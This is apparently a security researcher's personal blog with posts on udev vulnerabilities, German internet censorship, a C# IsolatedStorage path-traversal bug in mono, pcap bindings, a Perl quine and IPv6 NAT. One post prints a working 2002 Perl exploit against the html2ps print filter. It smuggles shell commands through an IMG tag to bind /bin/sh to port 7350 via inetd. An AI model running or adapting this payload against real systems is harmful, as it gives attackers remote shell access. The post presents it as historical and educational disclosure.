Do not follow me on twitter

I just grabbed a login on twitter but I am probably
not going to publish something there. Its just
a place holder.

I reviewed a lot of messaging code (hal, upstart etc.) during the last few weeks
as a post-handling of the udev issue. I learned a lot and
thats great, but no new interesting issues so far.

New WWW censorship (f)laws in .de

I am usually not into politics, but today its necessary and I
hope I am not forced too often to write such statements.
Its about the german government introducing censorship
into the WWW while big companies spy on their employees.
Instead of bringing law to the people, flaw is brought to
the people.

Das Ministerium für Gedöhns (O-Ton Ex-Bukasch) hat es geschafft
die deutschen Internetprovider zu Leymen. Brav unterzeichnen sie
in der Majorität Knebelverträge mit dem BKA (Quelle Wikileaks).
Komisch wie schnell soetwas geht, während Datenskandalen
und Misswirtschaft anscheinend nicht beizukommen ist.
Es ist wohl alles nur eine Frage des richtigen Leyms.
Nach bekanntem Muster werden mal wieder eine handvoll Perversitäten
oder Terroristen als Anlass genommen den Bürger noch
ein Stück mehr zu gängeln.

Mich würde rein technisch interessieren wieviel Latenz bereits
jetzt durch genannte Sperren, Filter, Bundestrojaner,
Vorratsdatenspeicherung, Legal-Interception Implementierungen usw.
verloren geht. Wahrscheinlich ruft mich die T deshalb drei
mal die Woche an, ob ich nicht auf VDSL upgraden möchte.

udev trickery (CVE-2009-1185 and CVE-2009-1186)

While the security industry is making weird statements about
no-more-free-hugs and OSX vs. Windows exploitation fun,
I add my two cents on UNIX exploitation.

There have been two problems in all currently running udevd's
which are shipped on all major Linux distributions. Even if you
install selinux or other hardening mechanisms, you are at risk
(please see above screenshot on a targeted selinux config).

The first problem (CVE-2009-1185) appears since the origin of
KOBJECT_UEVENT messages are not verified, so any user can spoof
messages that udevd takes as granted from kernel. This allows
some trickery to create a device named /dev/random with permission
0666 but major and minor number of your root blockdevice. The rest
is code. Alternatively, CVE-2009-1186 could be exploited
which is a standard stack buffer overflow. Depending on the
configuration of the system CVE-2009-1185 can also be exploited
with weird network interface-names and alike so at the end,
chrooted/jailed or PrivSep'ed users have good chance to get a full rootshell.

sharpen your .NET skills

I have had dozens of discussions about C#; being a secure
language and that CLR/VM based languages should be used
with new projects in order to increase security. One argument
is that memory corruption can't happen any longer.
I agree, but always point out that C# code is not secure
automagically, even if the programmers code is correct.
The runtime might be buggy as well! I recently read an
article in the famous german iX magazine about security measurements
in .NET. One of the measures is the so called IsolatedStorage
which allows you to store data in a secure way. Much like
a database, based on a token you can store/retrieve data
without your real filesystem being at risk. Nice thing,
and I coded an example-server:

using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.IO.IsolatedStorage;

class Server {

  private static void store(string key, Byte[] b)
  {
          try {
                  Console.WriteLine("Isolated storage @ {0}", key);
                  IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Create);
                  fs.Write(b, 0, b.Length);
                  fs.Close();   
          } catch {
                  Console.WriteLine("Exception!");
          }
  }

  private static Byte[] load(string key)
  {
          Byte[] b = new Byte[256];
          try {
                  Console.WriteLine("IsolatedStorage load @ {0}", key);
                  IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Open);
                  fs.Read(b, 0, b.Length);
                  fs.Close();   
          } catch {
                  Console.WriteLine("Exception!");
          }
          return b;
  }
  public static void Main()
  {
          Byte[] buf = new Byte[256];
          int cnt;

          string data = "";

          ASCIIEncoding ascii = new ASCIIEncoding();
          TcpListener l = new TcpListener(8080);
          l.Start();
          try {
                  Socket s = l.AcceptSocket();
                  while (data.Trim() != "quit") {
                          Array.Clear(buf, 0, buf.Length);
                          if ((cnt = s.Receive(buf, buf.Length, 0)) == 0)
                                  break;
                          data = ascii.GetString(buf, 0, cnt);
                          Console.WriteLine("Received: {0}", data.Trim());
                          if (data.StartsWith("store ")) {
                                  Array.Clear(buf, 0, buf.Length);
                                  if (s.Receive(buf, buf.Length, 0) == 0)
                                          break;
                                  store(data.Substring(6, data.Length - 6).Trim(), buf);
                          } else if (data.StartsWith("load ")) {
                                  Byte[] result = load(data.Substring(5, data.Length - 5).Trim());
                                  s.Send(result);
                          }
                  }
          } catch {
                  Console.WriteLine("Exception!");
          }
          l.Stop();
  }
}

You can connect to the server on TCP port 8080 and
store/load data via the telnet interface for example.
Beside the easy of code and the fact that it treats
TCP streams like messages which could make trouble in
real networking environments, this code should be correct.
It fits perfectly as a localhost example. There is just
a problem with the IsolatedStorage itself!
Some versions of the mono runtime do not remove
"../" character sequences from the path component as it
should. So, depending on your configuration you can
obtain funny results. On a openSUSE 11.1, the storage
place is in ~/.config/.isolated-storage/[some-hash]/.
An attacking scenario is inside the xterm.
I already informed the maintainers and a fix is underway.
Its not a big issue, and I dont have any application in mind
that is actually vulnerable and uses IsolatedStorage this way.

File-system/storage tricks will be a major playground for
.NET/C# applications in future. In a non-public review
of a larger C# based "system" it turned out that it was possible to obtain
local root privileges by loading evil assemblies as
a result of tricking the application.
Additionally, the managed runtime may provide
(depending on the implementation) all the
nasty things that we got rid of in native CPUs during
the last years: executable data, fixed addresses etc.

PcapSharp updated

You can find a new pcap# version of my mono pcap binding
on my website. Its better tested than the old version,
and supports packet dumping and offline capturing of packets
now as well as it supported online capturing in the past.
It is possible to read/analyze the pcap# dump-files with
tcpdump and wireshark. I am not an expert for Marshalling
C# types to plain C types, but I think I got it right :-)

Some news

This post satisfies two needs (except publishing code at all):

First, I hate how this blog automatically wraps my lines and
how it de-formats all things I am doing. I try to submit
pure HTML code now and hope it works. Second, I decided to
publish some old exploits of me for historical, technical
and educational purposes. A recent law-case in Germany showed
that jail-or-not is all about your intention. It is legal
to publish dual-use code or code that could be used to do
something evil if your intention is to make the world a more
secure place or to teach others how to protect themself etc..
It is illegal to publish such code in order to commit a crime
which is clearly and obviosuly not what I am doing.

The code is that old (2002), that there should rarely be any box at all
which still ships the vulnerable print-filter that is exploited
here. So, except for teaching something this code is useless.
The interesting thing about this piece is that the printfilter didnt
accept spaces in the IMG-tag. But read yourself:

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls printfilters as any
# other print-spooling systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)


sub usage
{
        print "\n$0 <printhost> <remote-host>\n".
              "\tprinthost   -- name of printer in /etc/printcap\n".
              "\tremote-host -- IP or hostname of host where shell appears\n".
              "'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
        exit;
}


my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O<<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

if (fork() == 0) {
        exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);

James Bond seriously wounded in action

I am impressed. The readers of this little blog still seem to be what they learned as a kid on foreign
Sun's. Guerilla :-) No comment on my postings, never, or at least very rarely. But, its really read!
The last posting produced > 700 hits in less than 2 days to the perl code morphing example.
Without actually really announcing it somewhere at big places.
Cleaned from accesses of the google-bot etc there is still ~ 700 hits. Thats great!
So, I will continue. From time to time :-)

As a thank-you I will post a picture I took at a car park on one of my walks through the city together with
a good friend of mine. We used to take large walks of about 3h or so mostly in urban places,
dumpster-dive or attend on closed conferences or events where we were never invited at, shaking hands
with some big NATO generals for example. Its just a matter of who you say you are.

$_='print"\$_=\47$_\47;eval"';eval

If you enjoy self-generating, self-replicating or self-modifying code as much as me,
you can have a look here. The exponential more-perl engine is probably
never executed in the 5th generation, except you have plenty of RAM
and CPU power (e.g. you work for google:).
All samples you can download execute the same code at the end, even though
they need to un-nest and reorder the instructions until original code,
including comments, is reached.

IPv6 NAT

During my last ITO project I worked on a solution to implement some kind of NAT
for IPv6. Packet-mangling solutions such as netfilter are missing IPv6 NAT for a good
reason: One of IPv6' design goals was the end-to-end principle and NAT often puts
people in the wrong feeling of security. NAT is one major reason why VoIP-breakhrough
came so late.
However, transparent proxying and redirection of connections is also done via NAT,
and thats where NAT for IPv6 makes sense: to setup SPAM-traps, transparent
virii-scanning or HTTP proxies. My solution works on Linux kernels >= 2.6.14,
running as a normal user-space daemon.

Happy new 2009!

Recent 25c3 was a funny event, although I missed a couple of friends to talk to.

So, I could use some time-slots to talk to the OpenBSD folks about security,
which is always funny. Beside our differences about the meaning of exploitability,
they nevertheless do a good job and I highly respect their voluntary work, in
particular in a $$-driven (security-)world. Even on such event, about 2/3 of
the folks only talk about $$ and what kind of customer is waiting for new
'solutions'.
Thanks to the french telco guys for the free beer and the funny stories.